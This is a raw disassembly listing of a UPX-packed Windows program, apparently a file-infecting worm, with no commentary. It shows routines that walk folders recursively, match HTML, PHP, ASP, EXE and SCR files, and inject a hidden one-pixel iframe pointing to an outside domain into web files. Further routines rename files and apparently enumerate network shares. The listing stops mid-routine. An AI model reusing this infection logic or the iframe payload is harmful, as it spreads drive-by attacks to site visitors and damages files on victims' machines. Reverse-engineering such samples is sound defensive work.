loc_40A1A3: ; CODE XREF: sub_40A140+41�j
; sub_40A140+51�j
inc ebx
dec ecx
jnz short loc_40A161
mov ebx, [ebp+arg_4]
loc_40A1AA: ; CODE XREF: sub_40A140+19�j
mov [ebp+var_10], esp
movzx eax, byte ptr [ebx+2]
mov [ebp+var_4], eax
test eax, eax
jz short loc_40A1C2
mov esi, [ebp+arg_C]
loc_40A1BB: ; CODE XREF: sub_40A140+80�j
push dword ptr [esi+eax*4-4]
dec eax
jnz short loc_40A1BB
loc_40A1C2: ; CODE XREF: sub_40A140+76�j
movzx ecx, byte ptr [ebx]
cmp ecx, 4
jnz short loc_40A1E0
push 0FFFFFFFDh
inc [ebp+var_4]
cmp byte ptr [ebx+3], 9
jz short loc_40A1DB
cmp byte ptr [ebx+3], 0Dh
jnz short loc_40A1E0
loc_40A1DB: ; CODE XREF: sub_40A140+93�j
mov ecx, 8
loc_40A1E0: ; CODE XREF: sub_40A140+88�j
; sub_40A140+99�j
mov [ebp+var_C], esp
push edx
lea eax, [ebp+var_30]
push eax
push ecx
push edx
call sub_40A130
pop edx
pop ecx
push [ebp+arg_14]
lea eax, [ebp+var_10]
push eax
push ecx
push edx
push offset dword_40B2BC
push [ebp+arg_8]
mov eax, [ebp+arg_0]
push eax
mov eax, [eax]
call dword ptr [eax+18h]
test eax, eax
jz short loc_40A21D
lea edx, [ebp+var_30]
mov cl, 1
push ecx
mov ecx, [ebp+4]
jmp sub_40A050
; ---------------------------------------------------------------------------
loc_40A21D: ; CODE XREF: sub_40A140+CD�j
mov esp, edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
sub_40A140 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A228 proc near ; DATA XREF: UPX0:0040A41A�o
; UPX0:off_40B014�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, esp
push eax
lea eax, [ebp+arg_C]
push eax
push eax
push dword ptr [ebx]
lea eax, [ebx+5]
push eax
push [ebp+arg_4]
call sub_40A140
movzx eax, byte ptr [ebx+4]
mov ebx, [ebp+arg_0]
jmp off_40A259[eax*4]
; ---------------------------------------------------------------------------
off_40A259 dd offset loc_40A2FE ; DATA XREF: sub_40A228+2A�r
dd offset loc_40A2FE
dd offset loc_40A2FA
dd offset loc_40A2FA
dd offset loc_40A29D
dd offset loc_40A2A3
dd offset loc_40A2A9
dd offset loc_40A2A3
dd offset loc_40A2AF
dd offset loc_40A2C3
dd offset loc_40A2FE
dd offset loc_40A2FA
dd offset loc_40A2D7
dd offset loc_40A2C3
dd offset loc_40A2FE
dd offset loc_40A2FE
dd offset loc_40A2FA
; ---------------------------------------------------------------------------
loc_40A29D: ; CODE XREF: sub_40A228+2A�j
; DATA XREF: sub_40A228+41�o
fld dword ptr [esp+14h+var_C]
jmp short loc_40A2FE
; ---------------------------------------------------------------------------
loc_40A2A3: ; CODE XREF: sub_40A228+2A�j
; DATA XREF: sub_40A228+45�o ...
fld [esp+14h+var_C]
jmp short loc_40A2FE
; ---------------------------------------------------------------------------
loc_40A2A9: ; CODE XREF: sub_40A228+2A�j
; DATA XREF: sub_40A228+49�o
fild [esp+14h+var_C]
jmp short loc_40A2FE
; ---------------------------------------------------------------------------
loc_40A2AF: ; CODE XREF: sub_40A228+2A�j
; DATA XREF: sub_40A228+51�o
mov eax, [ebx]
test eax, eax
jz short loc_40A2BB
push eax
call sub_4095B8
loc_40A2BB: ; CODE XREF: sub_40A228+8B�j
mov eax, dword ptr [esp+14h+var_C]
mov [ebx], eax
jmp short loc_40A2FE
; ---------------------------------------------------------------------------
loc_40A2C3: ; CODE XREF: sub_40A228+2A�j
; DATA XREF: sub_40A228+55�o ...
mov eax, [ebx]
test eax, eax
jz short loc_40A2CF
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_40A2CF: ; CODE XREF: sub_40A228+9F�j
mov eax, dword ptr [esp+14h+var_C]
mov [ebx], eax
jmp short loc_40A2FE
; ---------------------------------------------------------------------------
loc_40A2D7: ; CODE XREF: sub_40A228+2A�j
; DATA XREF: sub_40A228+61�o
mov eax, ebx
call sub_403CCC
mov eax, [esp+14h+var_14]
mov [ebx], eax
mov eax, [esp+14h+var_10]
mov [ebx+4], eax
mov eax, dword ptr [esp+14h+var_C]
mov [ebx+8], eax
mov eax, dword ptr [esp+14h+var_C+4]
mov [ebx+0Ch], eax
jmp short loc_40A2FE
; ---------------------------------------------------------------------------
loc_40A2FA: ; CODE XREF: sub_40A228+2A�j
; DATA XREF: sub_40A228+39�o ...
mov eax, dword ptr [esp+14h+var_C]
loc_40A2FE: ; CODE XREF: sub_40A228+2A�j
; sub_40A228+79�j ...
add esp, 10h
pop ebx
pop ebp
retn
sub_40A228 endp
; =============== S U B R O U T I N E =======================================
sub_40A304 proc near ; DATA XREF: UPX0:0040A446�o
; UPX0:off_40C034�o
cmp dword_40C620, 0
jz short loc_40A313
call dword_40C620
loc_40A313: ; CODE XREF: sub_40A304+7�j
cmp dword_40B2E4, 0FFFFFFFFh
jz short loc_40A368
cmp dword_40B2D0, 0
jz short loc_40A368
mov eax, dword_40B2E4
push eax
push 0
call dword_40B2D0
call sub_4095C8
mov byte_40C624, al
mov eax, off_40B350
cmp byte ptr [eax], 0
jnz short loc_40A35D
test byte ptr dword_40B2E4, 2
jnz short loc_40A35D
cmp dword_40B2E4, 0
jz short loc_40A35D
xor eax, eax
jmp short loc_40A35F
; ---------------------------------------------------------------------------
loc_40A35D: ; CODE XREF: sub_40A304+41�j
; sub_40A304+4A�j ...
mov al, 1
loc_40A35F: ; CODE XREF: sub_40A304+57�j
mov edx, off_40B350
mov [edx], al
retn
; ---------------------------------------------------------------------------
loc_40A368: ; CODE XREF: sub_40A304+16�j
; sub_40A304+1F�j
push 0
call near ptr dword_409578+30h
call sub_4095C8
mov byte_40C624, al
retn
sub_40A304 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40A3F2
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C614
jnz short loc_40A3E4
mov byte_40C618, 1
mov eax, dword_40C61C
call sub_4028F4
mov eax, off_40B434
xor edx, edx
mov [eax], edx
mov eax, off_40B334
xor edx, edx
mov [eax], edx
mov eax, off_40B40C
xor edx, edx
mov [eax], edx
cmp byte_40C624, 0
jz short loc_40A3CF
call sub_4095B0
loc_40A3CF: ; CODE XREF: UPX0:0040A3C8�j
mov eax, offset dword_40B2E8
mov ecx, 4
mov edx, off_401000
call sub_40387C
loc_40A3E4: ; CODE XREF: UPX0:0040A393�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A3F9
loc_40A3F1: ; CODE XREF: UPX0:0040A3F7�j
retn
; ---------------------------------------------------------------------------
loc_40A3F2: ; DATA XREF: UPX0:0040A382�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A3F1
; ---------------------------------------------------------------------------
loc_40A3F9: ; CODE XREF: UPX0:loc_40A3F1�j
; DATA XREF: UPX0:0040A3EC�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C614, 1
jnb short locret_40A44C
call sub_4099A4
mov eax, off_40B40C
mov dword ptr [eax], offset sub_409FD0
mov eax, off_40B334
mov dword ptr [eax], offset sub_40A228
mov eax, off_40B434
mov dword ptr [eax], offset sub_409AA8
mov eax, off_40B310
cmp byte ptr [eax], 0
jnz short locret_40A44C
mov eax, off_40B3C4
mov eax, [eax]
mov dword_40C620, eax
mov eax, off_40B3C4
mov dword ptr [eax], offset sub_40A304
locret_40A44C: ; CODE XREF: UPX0:0040A403�j
; UPX0:0040A433�j
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40A475
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C628
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A47C
loc_40A474: ; CODE XREF: UPX0:0040A47A�j
retn
; ---------------------------------------------------------------------------
loc_40A475: ; DATA XREF: UPX0:0040A456�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A474
; ---------------------------------------------------------------------------
loc_40A47C: ; CODE XREF: UPX0:loc_40A474�j
; DATA XREF: UPX0:0040A46F�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub dword_40C628, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40A4AD
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C62C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A4B4
loc_40A4AC: ; CODE XREF: UPX0:0040A4B2�j
retn
; ---------------------------------------------------------------------------
loc_40A4AD: ; DATA XREF: UPX0:0040A48E�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A4AC
; ---------------------------------------------------------------------------
loc_40A4B4: ; CODE XREF: UPX0:loc_40A4AC�j
; DATA XREF: UPX0:0040A4A7�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C62C, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40A4E5
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C630
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A4EC
loc_40A4E4: ; CODE XREF: UPX0:0040A4EA�j
retn
; ---------------------------------------------------------------------------
loc_40A4E5: ; DATA XREF: UPX0:0040A4C6�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A4E4
; ---------------------------------------------------------------------------
loc_40A4EC: ; CODE XREF: UPX0:loc_40A4E4�j
; DATA XREF: UPX0:0040A4DF�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub dword_40C630, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40A51D
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C634
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A524
loc_40A51C: ; CODE XREF: UPX0:0040A522�j
retn
; ---------------------------------------------------------------------------
loc_40A51D: ; DATA XREF: UPX0:0040A4FE�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A51C
; ---------------------------------------------------------------------------
loc_40A524: ; CODE XREF: UPX0:loc_40A51C�j
; DATA XREF: UPX0:0040A517�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C634, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40A555
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C638
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A55C
loc_40A554: ; CODE XREF: UPX0:0040A55A�j
retn
; ---------------------------------------------------------------------------
loc_40A555: ; DATA XREF: UPX0:0040A536�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A554
; ---------------------------------------------------------------------------
loc_40A55C: ; CODE XREF: UPX0:loc_40A554�j
; DATA XREF: UPX0:0040A54F�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub dword_40C638, 1
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40A58D
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C63C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A594
loc_40A58C: ; CODE XREF: UPX0:0040A592�j
retn
; ---------------------------------------------------------------------------
loc_40A58D: ; DATA XREF: UPX0:0040A56E�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A58C
; ---------------------------------------------------------------------------
loc_40A594: ; CODE XREF: UPX0:loc_40A58C�j
; DATA XREF: UPX0:0040A587�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C63C, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5A0 proc near ; CODE XREF: sub_40A848+276�p
var_3AC = dword ptr -3ACh
var_3A8 = dword ptr -3A8h
var_3A4 = dword ptr -3A4h
var_3A0 = byte ptr -3A0h
var_1D4 = byte ptr -1D4h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFC54h
push ebx
push esi
xor edx, edx
mov [ebp+var_3AC], edx
mov [ebp+var_3A8], edx
mov [ebp+var_3A4], edx
mov [ebp+var_4], edx
mov [ebp+var_8], edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_40A79C
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, esi
lea eax, [ebp+var_1D4]
call sub_404A22
mov eax, off_40B43C
mov byte ptr [eax], 0
lea eax, [ebp+var_1D4]
call sub_404CA3
mov eax, off_40B43C
mov byte ptr [eax], 2
call sub_402648
test eax, eax
jnz loc_40A771
lea eax, [ebp+var_3A4]
mov ecx, offset dword_40A7B4
mov edx, esi
call sub_403470
mov edx, [ebp+var_3A4]
lea eax, [ebp+var_3A0]
call sub_404A22
lea eax, [ebp+var_3A0]
call sub_404CAA
call sub_402648
test eax, eax
jz short loc_40A656
lea eax, [ebp+var_1D4]
call sub_404AC4
call sub_402618
jmp loc_40A771
; ---------------------------------------------------------------------------
loc_40A656: ; CODE XREF: sub_40A5A0+9F�j
xor ebx, ebx
jmp loc_40A6E4
; ---------------------------------------------------------------------------
loc_40A65D: ; CODE XREF: sub_40A5A0+156�j
lea edx, [ebp+var_4]
lea eax, [ebp+var_1D4]
call sub_4036B0
lea eax, [ebp+var_1D4]
call sub_404C40
call sub_402618
lea edx, [ebp+var_8]
mov eax, [ebp+var_4]
call sub_4064CC
mov edx, [ebp+var_8]
mov eax, offset aNtkrnlpa ; "ntkrnlpa"
call sub_4035DC
test eax, eax
jnz short loc_40A6A8
mov edx, [ebp+var_8]
mov eax, offset dword_40A7D8
call sub_4035DC
test eax, eax
jz short loc_40A6AC
loc_40A6A8: ; CODE XREF: sub_40A5A0+F5�j
mov bl, 1
jmp short loc_40A6FC
; ---------------------------------------------------------------------------
loc_40A6AC: ; CODE XREF: sub_40A5A0+106�j
mov edx, [ebp+var_8]
mov eax, offset dword_40A7E8
call sub_4035DC
test eax, eax
jz short loc_40A6CC
lea edx, [ebp+var_4]
mov ecx, eax
mov eax, offset aIframeSrcHttpZ ; "<iframe src=\"http://ZieF.pl/rc/\" width="...
call sub_403580
loc_40A6CC: ; CODE XREF: sub_40A5A0+11B�j
mov edx, [ebp+var_4]
lea eax, [ebp+var_3A0]
call sub_403688
call sub_404D83
call sub_402618
loc_40A6E4: ; CODE XREF: sub_40A5A0+B8�j
lea eax, [ebp+var_1D4]
call sub_404B00
call sub_402618
test al, al
jz loc_40A65D
loc_40A6FC: ; CODE XREF: sub_40A5A0+10A�j
lea eax, [ebp+var_3A0]
call sub_404AC4
call sub_402618
lea eax, [ebp+var_1D4]
call sub_404AC4
call sub_402618
test bl, bl
jz short loc_40A73F
lea eax, [ebp+var_3A8]
mov ecx, offset dword_40A7B4
mov edx, esi
call sub_403470
mov eax, [ebp+var_3A8]
call sub_40663C
jmp short loc_40A771
; ---------------------------------------------------------------------------
loc_40A73F: ; CODE XREF: sub_40A5A0+17E�j
mov eax, esi
call sub_40663C
mov eax, esi
call sub_403534
push eax
lea eax, [ebp+var_3AC]
mov ecx, offset dword_40A7B4
mov edx, esi
call sub_403470
mov eax, [ebp+var_3AC]
call sub_403534
push eax
call sub_405728 ; MoveFileA
loc_40A771: ; CODE XREF: sub_40A5A0+64�j
; sub_40A5A0+B1�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A7A3
loc_40A77E: ; CODE XREF: sub_40A5A0+201�j
lea eax, [ebp+var_3AC]
mov edx, 3
call sub_4031EC
lea eax, [ebp+var_8]
mov edx, 2
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_40A79C: ; DATA XREF: sub_40A5A0+2A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A77E
; ---------------------------------------------------------------------------
loc_40A7A3: ; CODE XREF: sub_40A5A0+1FB�j
; DATA XREF: sub_40A5A0+1D9�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40A5A0 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 4
dword_40A7B4 dd 504D542Eh, 0 ; sub_40A5A0+186�o ...
dd 0FFFFFFFFh, 8
aNtkrnlpa db 'ntkrnlpa',0 ; DATA XREF: sub_40A5A0+E9�o
align 10h
dd 0FFFFFFFFh, 7
dword_40A7D8 dd 6665697Ah, 6C702Eh, 0FFFFFFFFh, 7dword_40A7E8 dd 4F422F3Ch, 3E5944h, 0FFFFFFFFh, 3BhaIframeSrcHttpZ db '<iframe src="http://ZieF.pl/rc/" width=1 height=1></iframe>',0
; DATA XREF: sub_40A5A0+122�o
off_40A834 dd offset dword_40A838 ; DATA XREF: sub_40A848+1AB�r
; sub_40A848+3E0�r
dword_40A838 dd 312E0211h, 4, 401000h, 48h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A848 proc near ; CODE XREF: sub_40A848+10B�p
; sub_40AC70+FE�p ...
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_174 = qword ptr -174h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = byte ptr -15Ch
var_158 = dword ptr -158h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFE7Ch
push ebx
push esi
xor edx, edx
mov [ebp+var_184], edx
mov [ebp+var_180], edx
mov [ebp+var_17C], edx
mov [ebp+var_178], edx
mov [ebp+var_16C], edx
mov [ebp+var_168], edx
mov [ebp+var_8], edx
mov [ebp+var_C], edx
mov [ebp+var_4], eax
lea eax, [ebp+var_164]
mov edx, off_405A88
call sub_403784
xor eax, eax
push ebp
push offset loc_40AC3C
push dword ptr fs:[eax]
mov fs:[eax], esp
push 32h
call sub_405740 ; Sleep
lea eax, [ebp+var_168]
mov ecx, offset dword_40AC54
mov edx, [ebp+var_4]
call sub_403470
mov eax, [ebp+var_168]
lea ecx, [ebp+var_164]
mov edx, 37h
call sub_4065AC
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40AB8B
push dword ptr fs:[eax]
mov fs:[eax], esp
test ebx, ebx
jnz loc_40AB72
loc_40A8E9: ; CODE XREF: sub_40A848+324�j
test [ebp+var_15C], 10h
jz short loc_40A95D
mov eax, [ebp+var_158]
cmp byte ptr [eax], 2Eh
jnz short loc_40A92F
mov eax, [ebp+var_158]
call sub_403424
dec eax
jz loc_40AB5D
mov eax, [ebp+var_158]
call sub_403424
cmp eax, 2
jnz short loc_40A92F
mov eax, [ebp+var_158]
cmp byte ptr [eax+1], 2Eh
jz loc_40AB5D
loc_40A92F: ; CODE XREF: sub_40A848+B3�j
; sub_40A848+D5�j
push [ebp+var_4]
push [ebp+var_158]
push offset dword_40AC60
lea eax, [ebp+var_16C]
mov edx, 3
call sub_4034E4
mov eax, [ebp+var_16C]
call sub_40A848
jmp loc_40AB5D
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A848+A8�j
mov eax, [ebp+var_164]
call sub_4067C8
fstp [ebp+var_174]
wait
call sub_407104
fsub [ebp+var_174]
fld tbyte_40AC64
fcompp st(1), st
fnstsw ax
sahf
ja loc_40AB5D
lea edx, [ebp+var_8]
mov eax, [ebp+var_158]
call sub_40670C
mov eax, [ebp+var_8]
call sub_403424
add al, 0FCh
sub al, 2
jnb loc_40AB5D
mov eax, [ebp+var_8]
cmp byte ptr [eax], 2Eh
jnz loc_40AB5D
mov eax, [ebp+var_8]
mov al, [eax+1]
sub al, 47h
jz short loc_40A9C5
sub al, 20h
jnz short loc_40AA1F
loc_40A9C5: ; CODE XREF: sub_40A848+177�j
mov eax, [ebp+var_8]
mov al, [eax+2]
sub al, 48h
jz short loc_40A9D3
sub al, 20h
jnz short loc_40AA1F
loc_40A9D3: ; CODE XREF: sub_40A848+185�j
mov eax, [ebp+var_8]
mov al, [eax+3]
sub al, 4Fh
jz short loc_40A9E1
sub al, 20h
jnz short loc_40AA1F
loc_40A9E1: ; CODE XREF: sub_40A848+193�j
mov eax, [ebp+var_C]
call sub_404080
inc eax
push eax
lea eax, [ebp+var_C]
mov ecx, 1
mov edx, off_40A834
call sub_40423C
add esp, 4
mov eax, [ebp+var_C]
call sub_404088
mov edx, [ebp+var_C]
lea eax, [edx+eax*4]
mov edx, [ebp+var_158]
call sub_40321C
jmp loc_40AB5D
; ---------------------------------------------------------------------------
loc_40AA1F: ; CODE XREF: sub_40A848+17B�j
; sub_40A848+189�j ...
mov eax, [ebp+var_8]
mov al, [eax+1]
sub al, 48h
jz short loc_40AA2D
sub al, 20h
jnz short loc_40AA49
loc_40AA2D: ; CODE XREF: sub_40A848+1DF�j
mov eax, [ebp+var_8]
mov al, [eax+2]
sub al, 54h
jz short loc_40AA3B
sub al, 20h
jnz short loc_40AA49
loc_40AA3B: ; CODE XREF: sub_40A848+1ED�j
mov eax, [ebp+var_8]
mov al, [eax+3]
sub al, 4Dh
jz short loc_40AA9D
sub al, 20h
jz short loc_40AA9D
loc_40AA49: ; CODE XREF: sub_40A848+1E3�j
; sub_40A848+1F1�j
mov eax, [ebp+var_8]
mov al, [eax+1]
sub al, 50h
jz short loc_40AA57
sub al, 20h
jnz short loc_40AA73
loc_40AA57: ; CODE XREF: sub_40A848+209�j
mov eax, [ebp+var_8]
mov al, [eax+2]
sub al, 48h
jz short loc_40AA65
sub al, 20h
jnz short loc_40AA73
loc_40AA65: ; CODE XREF: sub_40A848+217�j
mov eax, [ebp+var_8]
mov al, [eax+3]
sub al, 50h
jz short loc_40AA9D
sub al, 20h
jz short loc_40AA9D
loc_40AA73: ; CODE XREF: sub_40A848+20D�j
; sub_40A848+21B�j
mov eax, [ebp+var_8]
mov al, [eax+1]
sub al, 41h
jz short loc_40AA81
sub al, 20h
jnz short loc_40AAC8
loc_40AA81: ; CODE XREF: sub_40A848+233�j
mov eax, [ebp+var_8]
mov al, [eax+2]
sub al, 53h
jz short loc_40AA8F
sub al, 20h
jnz short loc_40AAC8
loc_40AA8F: ; CODE XREF: sub_40A848+241�j
mov eax, [ebp+var_8]
mov al, [eax+3]
sub al, 50h
jz short loc_40AA9D
sub al, 20h
jnz short loc_40AAC8
loc_40AA9D: ; CODE XREF: sub_40A848+1FB�j
; sub_40A848+1FF�j ...
push 5
call sub_405740 ; Sleep
lea eax, [ebp+var_178]
mov ecx, [ebp+var_158]
mov edx, [ebp+var_4]
call sub_403470
mov eax, [ebp+var_178]
call sub_40A5A0
jmp loc_40AB5D
; ---------------------------------------------------------------------------
loc_40AAC8: ; CODE XREF: sub_40A848+237�j
; sub_40A848+245�j ...
mov eax, [ebp+var_8]
mov al, [eax+1]
sub al, 45h
jz short loc_40AAD6
sub al, 20h
jnz short loc_40AAF2
loc_40AAD6: ; CODE XREF: sub_40A848+288�j
mov eax, [ebp+var_8]
mov al, [eax+2]
sub al, 58h
jz short loc_40AAE4
sub al, 20h
jnz short loc_40AAF2
loc_40AAE4: ; CODE XREF: sub_40A848+296�j
mov eax, [ebp+var_8]
mov al, [eax+3]
sub al, 45h
jz short loc_40AB1C
sub al, 20h
jz short loc_40AB1C
loc_40AAF2: ; CODE XREF: sub_40A848+28C�j
; sub_40A848+29A�j
mov eax, [ebp+var_8]
mov al, [eax+1]
sub al, 53h
jz short loc_40AB00
sub al, 20h
jnz short loc_40AB5D
loc_40AB00: ; CODE XREF: sub_40A848+2B2�j
mov eax, [ebp+var_8]
mov al, [eax+2]
sub al, 43h
jz short loc_40AB0E
sub al, 20h
jnz short loc_40AB5D
loc_40AB0E: ; CODE XREF: sub_40A848+2C0�j
mov eax, [ebp+var_8]
mov al, [eax+3]
sub al, 52h
jz short loc_40AB1C
sub al, 20h
jnz short loc_40AB5D
loc_40AB1C: ; CODE XREF: sub_40A848+2A4�j
; sub_40A848+2A8�j ...
push 5
call sub_405740 ; Sleep
push 0
push 0
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_17C]
mov ecx, [ebp+var_158]
mov edx, [ebp+var_4]
call sub_403470
mov eax, [ebp+var_17C]
call sub_403534
push eax
call sub_405688 ; CreateFileA
push eax
call sub_405680 ; CloseHandle
loc_40AB5D: ; CODE XREF: sub_40A848+C1�j
; sub_40A848+E1�j ...
lea eax, [ebp+var_164]
call sub_4065FC
mov ebx, eax
test ebx, ebx
jz loc_40A8E9
loc_40AB72: ; CODE XREF: sub_40A848+9B�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40AB92
loc_40AB7F: ; CODE XREF: sub_40A848+348�j
lea eax, [ebp+var_164]
call sub_406620
retn
; ---------------------------------------------------------------------------
loc_40AB8B: ; DATA XREF: sub_40A848+8E�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AB92: ; CODE XREF: sub_40A848+342�j
; DATA XREF: sub_40A848+332�o
mov eax, [ebp+var_C]
call sub_404088
mov esi, eax
test esi, esi
jl short loc_40ABE7
inc esi
xor ebx, ebx
loc_40ABA3: ; CODE XREF: sub_40A848+39D�j
mov eax, [ebp+var_C]
mov ecx, [eax+ebx*4]
lea eax, [ebp+var_180]
mov edx, [ebp+var_4]
call sub_403470
mov eax, [ebp+var_180]
xor edx, edx
call sub_406520
mov eax, [ebp+var_C]
mov ecx, [eax+ebx*4]
lea eax, [ebp+var_184]
mov edx, [ebp+var_4]
call sub_403470
mov eax, [ebp+var_184]
call sub_40663C
inc ebx
dec esi
jnz short loc_40ABA3
loc_40ABE7: ; CODE XREF: sub_40A848+356�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40AC43
loc_40ABF4: ; CODE XREF: sub_40A848+3F9�j
lea eax, [ebp+var_184]
mov edx, 4
call sub_4031EC
lea eax, [ebp+var_16C]
mov edx, 2
call sub_4031EC
lea eax, [ebp+var_164]
mov edx, off_405A88
call sub_403850
lea eax, [ebp+var_C]
mov edx, off_40A834
call sub_404248
lea eax, [ebp+var_8]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_40AC3C: ; DATA XREF: sub_40A848+4E�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40ABF4
; ---------------------------------------------------------------------------
loc_40AC43: ; CODE XREF: sub_40A848+3F3�j
; DATA XREF: sub_40A848+3A7�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40A848 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 3
dword_40AC54 dd 2A2E2Ah, 0FFFFFFFFh, 1dword_40AC60 dd 5Ch tbyte_40AC64 dt 1.3888888888888888889e-2 ; DATA XREF: sub_40A848+132�r
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC70 proc near ; CODE XREF: sub_40AC70+BB�p
; sub_40AF30+7B�p
var_201C = dword ptr -201Ch
var_2018 = dword ptr -2018h
var_2014 = byte ptr -2014h
var_2008 = byte ptr -2008h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push eax
mov eax, 2
loc_40AC79: ; CODE XREF: sub_40AC70+11�j
add esp, 0FFFFF004h
push eax
dec eax
jnz short loc_40AC79
mov eax, [ebp+var_4]
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
xor edx, edx
mov [ebp+var_2018], edx
mov [ebp+var_201C], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40ADCC
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
push eax
push ebx
push 0
push 1
push 2
call sub_405760
test eax, eax
jnz loc_40ADAE
xor edx, edx
push ebp
push offset loc_40ADA7
push dword ptr fs:[edx]
mov fs:[edx], esp
mov [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], 2000h
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2014]
push eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_4]
push eax
call sub_405758
test eax, eax
jz short loc_40AD04
call sub_402D38
jmp loc_40ADAE
; ---------------------------------------------------------------------------
loc_40AD04: ; CODE XREF: sub_40AC70+88�j
mov eax, [ebp+var_8]
dec eax
test eax, eax
jl loc_40AD90
inc eax
mov [ebp+var_10], eax
lea eax, [ebp+var_2008]
mov [ebp+var_14], eax
loc_40AD1D: ; CODE XREF: sub_40AC70+11E�j
mov eax, [ebp+var_14]
test byte ptr [eax], 2
jz short loc_40AD32
mov eax, [ebp+var_14]
add eax, 0FFFFFFF4h
call sub_40AC70
jmp short loc_40AD87
; ---------------------------------------------------------------------------
loc_40AD32: ; CODE XREF: sub_40AC70+B3�j
mov eax, [ebp+var_14]
mov ebx, [eax+8]
test ebx, ebx
jz short loc_40AD87
xor eax, eax
push ebp
push offset loc_40AD7D
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_201C]
